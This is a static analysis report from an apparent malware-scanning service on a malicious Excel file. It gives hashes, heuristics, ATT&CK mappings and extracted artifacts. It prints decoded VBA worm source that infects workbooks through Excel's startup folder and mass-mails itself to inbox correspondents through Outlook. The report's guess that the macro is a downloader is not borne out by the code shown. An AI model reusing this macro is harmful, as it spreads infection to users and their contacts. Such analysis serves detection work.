Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0cf2e878cb2b2170…

MALICIOUS

Office (OLE)

473.0 KB Created: 2000-10-04 08:10:43 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 55e4a0276902d1c1616d1d691a8329a2 SHA-1: cd6cb4cd14fe964a9151cd5c36204dfa62e05e9a SHA-256: 0cf2e878cb2b217060094b6837045256369fa873eaa3e9ba72fcb7ca9ed2b496
142 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file is an Excel document containing a VBA macro with an Auto_Open subroutine. This subroutine, along with a CreateObject call, indicates an attempt to execute arbitrary code. The macro likely serves as a downloader for a second-stage payload, and the presence of embedded OLE packages suggests further malicious content. The Auto_Open macro and CreateObject calls are strong indicators of malicious intent, aligning with spearphishing attachment tactics.

Heuristics 5

  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGE
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 5

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 15068 bytes
SHA-256: 165694809904067ebfafeccc9f70c267dadd771f3382ba3b792859dfc96fa758
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet611"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True



Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "List3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "EGManalo"
'...........................................
'INC: 86 years and going strong. More power!
'July 26, 1914
'
'Electronics and Communications Engineering
'New Era University
'Milton Hills Subd., Diliman, Quezon City
'...........................................
'By AnGeL - Anak ng Sugo
'...........................................


Sub Auto_Open()
        Application.OnSheetActivate = "Run"
End Sub
Sub Send()

On Error Resume Next
MsgBox ("yes")
Set OL = CreateObject("Outlook.Application")
Set UNS = OL.GetNamespace("MAPI")

Set UIB = UNS.GetDefaultFolder(6)

ActiveWorkbook.Save
Att = ActiveWorkbook.FullName

For i = 1 To UIB.Items.Count
    Set M = UIB.Items(i)
    Set Z = M.Reply
    A = MsgBox(Z.Recipients(1).Address)
    Set FM = OL.CreateItem(0)
    FM.Recipients.Add A
    FM.Attachments.Add Att
    FM.Send
Next

Set OL = Nothing
Set UNS = Nothing

End Sub
Sub Run()
        
On Error GoTo Over

SU$ = Application.StartupPath
F$ = Dir(SU$ & "\" & "Happy Anniversary.xls")
ngayon = Format(Now, "yyyymmdd")
'MsgBox (Application.Version)

If F$ <> "Happy Anniversary.xls" Then GoTo FDNE Else GoTo IOF

FDNE:
         
   INF$ = ActiveWorkbook.Name
   
   Application.ScreenUpdating = False

   Set bago = Workbooks.Add
    With bago
        .Title = ""
        .Subject = ""
    End With
   
   NWB$ = ActiveWorkbook.Name
   Bed$ = Workbooks(NWB$).Sheets(1).Name

   If Bed$ <> "EGManalo" _
      Then
        Workbooks(INF$).Sheets("THE CHURCH OF CHRIST").Copy Before:=Workbooks(NWB$).Sheets(1)
        'Workbooks(INF$).Sheets("EGManalo").Copy Before:=Workbooks(NWB$).Sheets(1)
        'Workbooks(NWB$).Sheets("EGManalo").Visible = False
        Workbooks(INF$).VBProject.VBComponents("EGManalo").Export ("c:\1")
        Workbooks(NWB$).VBProject.VBComponents.Import ("c:\1")
        Workbooks(NWB$).Sheets("THE CHURCH OF CHRIST").Visible = False
      Else
   End If

   ActiveWindow.Visible = False
      
   Workbooks(NWB$).SaveAs Filename:=Application.StartupPath & "/" & "Happy Anniversary.xls"

GoTo Over

IOF:
        
   Angelo$ = ActiveWorkbook.Name
   For i = 1 To Workbooks(Angelo$).VBProject.VBComponents.Count
   If Workbooks(Angelo$).VBProject.VBComponents(i).Type = 1 Then _
   If Workbooks(Angelo$).VBProject.VBComponents(i).Name = "EGManalo" Then GoTo Brk
   Next
   i = i - 1
Brk:
   FirstBed$ = Workbooks(Angelo$).VBProject.VBComponents(i).Name
        
   Application.ScreenUpdating = False
   
   If FirstBed$ <> "EGManalo" _
      Then
        'Workbooks("Happy Anniversary.xls").Sheets("EGManalo").Copy Before:=Workbooks(Angelo$).Sheets(1)
        Workbooks("Happy Anniversary.xls").VBProject.VBComponents("EGMan
... (truncated)
ole10native_00.bin ole-package OLE Ole10Native stream: MBD0000933E/Ole10Native 38180 bytes
SHA-256: 3e8003715f57c8fbf5f4d62053403aef6ba4e20b8e869c2b3738b8a60d920f5b
ole10native_01.bin ole-package OLE Ole10Native stream: MBD00009347/Ole10Native 36676 bytes
SHA-256: a7e601393bc6d38a6aceb5658cdd76874414a505a9136399746a9476d647a2e6
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.56, consistent with packed or encrypted content.
ole10native_02.bin ole-package OLE Ole10Native stream: MBD0000934C/Ole10Native 31236 bytes
SHA-256: 49c7dc99321ba74d0808c8ba6bdf83e50b17eb7f18337e2692f946e2d2c63d25
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact entropy is 7.45, consistent with packed or encrypted content.
ole10native_03.bin ole-package OLE Ole10Native stream: MBD0000934D/Ole10Native 105220 bytes
SHA-256: 0564ccfcc8b704bb8f893dedd52ef3a82130caad9c64008c5229b321dbacf00a

Open this report in the interactive analyzer, or submit your own file for analysis.